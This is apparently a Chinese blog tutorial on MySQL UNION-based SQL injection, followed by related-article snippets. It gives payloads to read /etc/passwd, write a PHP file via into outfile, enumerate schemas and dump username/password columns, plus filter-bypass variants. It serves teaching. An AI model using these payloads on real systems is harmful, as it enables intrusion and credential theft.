sql注入-union select

最新推荐文章于 2025-03-14 21:51:56 发布
最新推荐文章于 2025-03-14 21:51:56 发布
阅读量2.1w 收藏 150
点赞数 32
分类专栏: sql注入 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37133717/article/details/93498444
版权

什么是SQL注入

SQL注入(Sql Injection )

  1. 是一种将SQL语句插入或添加到应用(用户)的输入参数中的攻击
  2. 这些参数传递给后台的SQL数据库服务器加以解析并执行

哪里存在SQL注入?

  • GET
  • POST
  • HTTP头部注入
  • Cookie注入

任何客户端可控,传递到服务器的变量,并且和数据库进行交互,都有可能存在sql注入。

SQL注入的分类

  1. 根据SQL数据类型分类
  • 整型注入
  • 字符串类型注入
  1. 根据注入的语法分类
  • UNION query SQL injection(可联合查询注入)
  • Error-based SQL injection(报错型注入)
  • Boolean-based blind SQL injection(布尔型注入)
  • Time-based blind SQL injection(基于时间延迟注入)
  • Stacked queries SQL injection(可多语句查询注入)

如何去判断SQL注入漏洞

  • and 1=1 / and 1=2 回显页面不同(整形判断)
  • 单引号判断 ‘ 显示数据库错误信息或者页面回显不同(整形,字符串类型判断)
  • \ (转义符)
  • -1/+1 回显下一个或上一个页面(整型判断)
  • and sleep(5) (判断页面返回时间)

MySQL数据库的特性

MySQL中3种注释风格

  • # (url编码为%23)

  • – (–后边要跟上一个或多个空格 --+)

  • /* … */

  • /*! … */ 内联注释

    select * /!22222from/ users;(注:22222低于数据库版本号(5[0].7.20)就可显示from)

MySQL函数利用
常用函数
  • user()
  • database()
  • @@version
  • session_user()
  • @@basedir
  • @@datadir
  • @@version_compile_os
load_file( )函数 读文件操作

前提

  • 知道文件绝对路径
  • 能够使用union查询
  • 对web目录有写权限

UNION SELECT 1,load_file(’/etc/passwd’),3,4,5,6#
UNION SELECT 1,load_file(0x2f6574632f706173737764),3,4,5,6#

into outfile( )写文件操作

前提

  • 文件名必须全路径(绝对路径),
  • 用户必须有写文件的权限
  • 没有对 ‘ 引号过滤

SELECT ‘<?php phpinfo(); ?>’ into outfile ‘c:\Windows\tmp\1.php’

连接字符串函数
  • concat(str1,str2)
  • concat_ws(separator, str1,str2…)
  • group_concat(str1,str2…)
MySQL中information_scheme库

SCHEMATA表
字段:SCHEMA_NAME
TABLES表
字段:TABLE_SCHEMA, TABLE_NAME
COLUMNS表
字段:TBALE_SCHEMA,TABLE_NAME,COLUMN_NAME

MySQL中UNION规则
  • UNION必须由两条或两条以上的SELECT语句组成,语句之间用关键字UNION分隔
  • UNION中的每个查询必须包含相同的列。
  • UNION会从查询结果集中自动去除了重复行。
  • UNION query SQl injection

利用前提

  1. 页面上有显示位

    优点:
    方便、快捷、易于利用
    缺点:
    需要显示位

步骤

  1. 判断列数

    order by 10
    order by 20
    order by 15

  2. 判断显示位

    url?id=-1 union select 1,2,3,4,5

  3. 获取当数据库名称和当前连接数据库的用户

    url?id=-1 union select 1,2,databaes(),4,5
    url?id=-1 union select 1,2,user(),4,5

  4. 列出所有数据库

    limit 一个一个打印出来库名
    select SCHEMA_NAME from information_schema.SCHEMATA limit 0,1
    group_concat 一次性全部显示
    select group_concat(SCHEMA_NAME) from information_schema.SCHEMATA

  5. 列出(数据库:test)中所有的表

    limit 一个一个打印出来字段名
    select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=‘test’
    limit 0,1
    group_concat 一次性全部显示
    select group_concat(TABLE_NAME) from information_schema.TABLES where
    TABLE_SCHEMA=0x674657374
    注意:数据库名称可以用十六进制来代替字符串,这样可以绕过单引号的限制。

  6. 列出(数据库:test 表:admin )中所有的字段

    limit 一个一个打印出来
    select COLUMN_NAME from information_schema.COLUMNS where
    TABLE_SCHEMA=‘baji’ and TABLE_NAME=‘users’ limit 0,1
    group_concat 一次性全部显示
    select group_concat(COLUMN_NAME) from information_schema.COLUMNS where
    TABLE_SCHEMA=0x74657374 and TABLE_NAME=0x61646d696e

  7. 列出(数据库:test 表:admin )中的数据

    limit 一个一个打印出来
    select username,passwd from test.admin limit 0,1
    group_concat 把 一次性全部打印
    select group_concat(concat(username,0x20,passwd)) from test.admin
    network

2021-09-01 网安实验-SQL注入-绕过UNION&SELECT过滤
时光隧道
09-01 4万+
关键代码为: 在MySQL中tab,空格,回车都可以隔断语句,那么我们就可以用使用/**/ 或() 或+ 代替空格,%0c =换页、%09 = 水平制表符、%0d = 回车、%0a = 换行。那我们试试 『id=12211%27+uniOn%09selEct%0d1,2,password%0dfrom%0dusers%0dwhere%0did=%272%27||%27』 成功了呢。很多不可见的空白字符都可以用哦,你可以试试。 ...
sql注入杂谈(一)--union select
weixin_43570648的博客
03-19 1559
我就简单说说我对于联合注入的想法,以及对于联合注入绕过防火墙的方法,(只是我自己目前所掌握的方法,当然更多奇淫技巧还的需要我们自己去发掘)对于我们才学习安全的人来说,对于练习sql注入,我们学习最简单的语法就是sql注入之联合注入。 就拿sqli-labs来说说吧127.0.0.1/less-1/?id=1 我们的教程里面就说127.0.0.1/less-1/?id=1’ 加上单引号,看爆不爆错,...
SQLUnion查询注入
帅醉了的博客
03-03 773
0x00_简介 Union操作符是用于合并两个或者多个select语句的搜索结果集。 在sql注入攻击中,要使union成功执行,必须要满足四个条件: 1、与内部数据库具有相同的字段数。 2、列是相同的数据类型。 3、select语句中的顺序必须相同。 4、当前页面有回显点。 0x01_Union注入一般步骤 order by 判断字段 查看回显数据位置 读库信息 读表信息 读字段 读数据 0...
sql注入——联合注入union select
4pri1
05-22 1808
联合注入 Select * from users where id = 1; mysql> select * from t_unv where unv_id =1 union select 1,2,schema_name from information_schema.schemata; 这里的本来3的位置由schema_name替换,就是第二个图片中查询的所示。 这么写,就通过union select 把本来查询的东西拼接到了3的回显位置上。 mysql> select...
SQL注入-Union注入
最新发布
lza20001103的博客
03-14 922
SQL注入-Union注入
浅谈SQL注入中的-1‘ union select 1,2,3#
dzqxwzoe的博客
03-12 2036
经过本文的阅读,相信小白已经可以理解SQL注入语句中的这条语句了吧?将上面所有的内容概括为一句话就是大家常说的:判断回显位。当然,这条语句并不是固定的,要根据目标数据库返回的报错信息等各种情况来构造针对目标数据库的SQL注入语句。
显式Sql注入--Union Select联合注入
qq_17071759的博客
03-19 1370
主要写作用来个人学习总结; 今天复习了一下Union Select注入手法,对联合注入有了新的一些认识; 首先因为某些需求,数据库需要Union函数去实现,具体见链接https://blog.csdn.net/chunqiuwei/article/details/8008625 然后针对Union出现了一些Sql注入攻击手法,以Mysql为例; Mysql特性:数据库所有信息基本都存放在库...
关于sql注入(3)union注入
2301_81841047的博客
04-09 1166
还是关于我对SQL注入的理解,首先然后就是我对SQL注入现在的理解,与思路。一.判断类型(是否存在sql注入,存在那种sql注入)1.查找注入点:可以通过对其传入的可控参数(常见的有id,password等等)进行简单的构造,通过服务端返回的内容来判断有无注入注入位置有GET数据(大多存在地址栏)、POST数据(大多存在输入框中)、HTTP头部、cookie数据。2.判断是字符型注入还是数字型注入:首先我们假设注入类型为数字型,分别输入如下的语句。如果被测试对象是数字型。
WEB攻防-通用漏洞-SQL注入-MYSQL-union一般注入
weixin_45534587的博客
07-22 1060
id=-1' union select 1, 2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'#id=1' and 1=1%23,(%23代表#),其中and 1=1为真,所以返回结果相同。id=1' and 1=2%23,由于and 1=2为假,根据条件判断sql执行后是null的,所以返回未查到数据。
第十八节 绕过剔除黑名单(unionselect)的SQL注入-01
09-15
绕过剔除黑名单(unionselect)的SQL注入 SQL注入是一种常见的Web应用安全漏洞,攻击者可以通过在用户输入中注入恶意SQL代码来获取敏感数据或控制数据库。绕过剔除黑名单(unionselect)的SQL注入SQL注入攻击...
SQL注入-03】union联合查询注入案例
m0_64378913的博客
04-25 3969
目录1 union联合查询注入概述1.1 简介1.2 适用条件1.3 注入步骤1.4 注入技巧2 union联合查询注入案例2.1 操作环境2.2 操作具体步骤2.2.1 判断是否存在注入点及注入的类型2.2.2 使用ORDER BY 查询回显列数。2.2.3 判断显示位置2.2.4 获取数据库名2.2.5 获取数据库中的所有表名2.2.6 获取数据库的对应表中的所有字段名2.2.7 获取字段中的数据3 总结 本博客内容仅供学习探讨,请勿滥用乱用 1 union联合查询注入概述 1.1 简介 union
sql注入union联合注入
m0_63436163的博客
01-30 1164
联合查询注入是联合两个表进行注入攻击,使用关键词 union select 对两个表进行联合查询。两个表的字段数要相同,不然会出现报错。列数相同union 特性是显示两张表 我们就可以吧第一个参数变为--------的 或者不存在的值 就行了 显示就是以第二张表为主。
sql注入select/union select
@一只躺平的猪@的博客
07-14 3527
selectselect 1 from table、 select count(1) from table、select sum(1) from table union selectunion语句使用条件、判断字段数 union select 1,2(或union select null,null)、 判断回显位置
union select
weixin_33778778的博客
10-25 267
union select 联合查询 ,即合并(取交集,结果中没有重复行)前后两个查询;前提是前后查询视图必须拥有相同数量的列,列也必需拥有相同的数据类型。 union all select 则取的是两个查询的并集。...
SQL注入利用学习-Union联合注入
qq_61861243的博客
04-08 1656
SQL语句中查询数据时,使用select 相关语句与where 条件子句筛选符合条件的记录。如果该id=1 中的1 是用户可以控制输入的部分时,就有可能存在SQL注入漏洞。数据库提供联合查询,使得可以将两条SQL查询语句的结果进行连接。务必注意:两者的字段数必须一致。判断联合查询语句中的字段数时,可以使用order by num。当依次增大num时,如果出现错误,那么上 一条SQL查询语句的结果字段数就为num-1。
SQL SELECT UNION的应用
zoohouse的专栏
08-09 745
表A: 订单号       入库单号       数量       入库数量   001                                  500   002                                  300   003                                  400 表B: 订单号       入库单号       入库数量   001                R01                250   001         
SQL 注入——联合查询
weixin_51559599的博客
11-06 1334
information_schema 元数据库中的 columns 表中存储着数据库中所有的列。information_schema 元数据库中的 tables 表中存储着数据库中所有的表。语句,该语句会同时执行两条 select 语句,实现跨库、跨表查询。如果报错,则说明没有该列,继续向小的数字更改查询,直到查询出列数最大值。总共有 517 个表名,因为此前查出在 cms 表中,增加筛选条件。此处因为联合查询,每列的数据类型不同而报错,将。查看 cms_users 表中的字段。连接显示出整列中的内容。
SQL注入 unionselect替换为空绕过
m_de_g的博客
12-13 1645
SQL注入 unionselect替换为空绕过 1.基础知识介绍 1.MySQL中的大小写不敏感,大写与小写一样。用于绕过过滤的黑名单。 2.MySQL中的十六进制与URL编码 3.符号与关键字替换 and----&&、or----|| 4.空格使用%20表示、%0a换行、%09tab键 2.去除(union)的代码分析 preg_replace函数 preg_replace(mixed $pattern,mixed $replacement,mixed $subject):执行一个
sql注入union注入
2401_87248788的博客
12-17 835
这两句是union注入中较为重要的句子,大家在练习的时候建议敲一遍而不是复制粘贴,两句其实还挺像的,我把两句中的不同的地方标出来,方便大家记忆。到这里我们的sql注入union注入就结束了,大家可以到官网上去看一下,也有解题思路,我这篇文章就是借鉴他的解题思路和过程。从以上两张图看出,我们将id=1改为id=1‘,页面出错,可以判断这个是数字型注入。那么话不多说,开始今天的讲解。这里发现1=1输出正常,而是用1=2页面报错,初步判断存漏洞。将limit0,1改为1,1。Limit0,1更改为1,1。
union selectsql注入
01-09
### SQL注入攻击中的`UNION SELECT`用法 在SQL注入攻击中,`UNION SELECT`语句被用来组合两个或多个SELECT查询的结果集。当应用程序未能正确过滤用户输入时,攻击者可以利用此特性来附加额外的查询并检索数据库内的敏感数据。 例如,在存在漏洞的应用程序参数处插入如下恶意字符串: ```sql 1' UNION ALL SELECT NULL, version(), database() -- ``` 这条命令会尝试将原始查询与新创建的选择服务器版本号和当前使用的数据库名称的查询联合起来[^2]。 如果目标表中有三个字段,则上述有效载荷可能返回类似于下面的内容: | id | title | content | |----|-------------|---------| | 1 | Welcome Page| ... | | | 8.0.30 | mysql | 其中第二行来自攻击者的自定义查询而不是应用预期的数据记录。 ### 防护措施 为了防止这种类型的攻击发生,开发者应该采取以下几种方法之一或多样的安全实践: #### 输入验证与清理 确保所有外部输入都经过严格的校验,只允许合法字符通过,并移除任何潜在危险符号如单引号 `'`, 双划线 `--` 或其他特殊标记。 #### 使用预编译语句(Prepared Statements) 采用参数化查询而非直接拼接字符串构建最终指令文本。这使得即使包含有害成分也无法改变原有逻辑结构从而失去危害能力。 对于Python Flask框架而言,可以通过SQLAlchemy ORM实现这一点: ```python from sqlalchemy import create_engine, text engine = create_engine('mysql+pymysql://user:password@localhost/dbname') with engine.connect() as connection: result = connection.execute( text("SELECT * FROM users WHERE username=:username"), {"username": user_input} ) ``` #### 启用Web Application Firewall (WAF) 部署专门设计用于识别已知模式并向管理员发出警报的安全设备可以帮助减轻风险水平。这些工具能够自动拦截大多数常见的SQLi企图而不影响正常业务流程继续运行下去[^3]。 #### 定期扫描网站内容 使用像DIRB这样的自动化工具定期检查是否有未授权访问路径暴露在外网环境中是非常重要的预防手段之一。这类软件基于字典暴力枚举URL地址空间寻找隐藏资源文件夹链接等信息泄露点。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值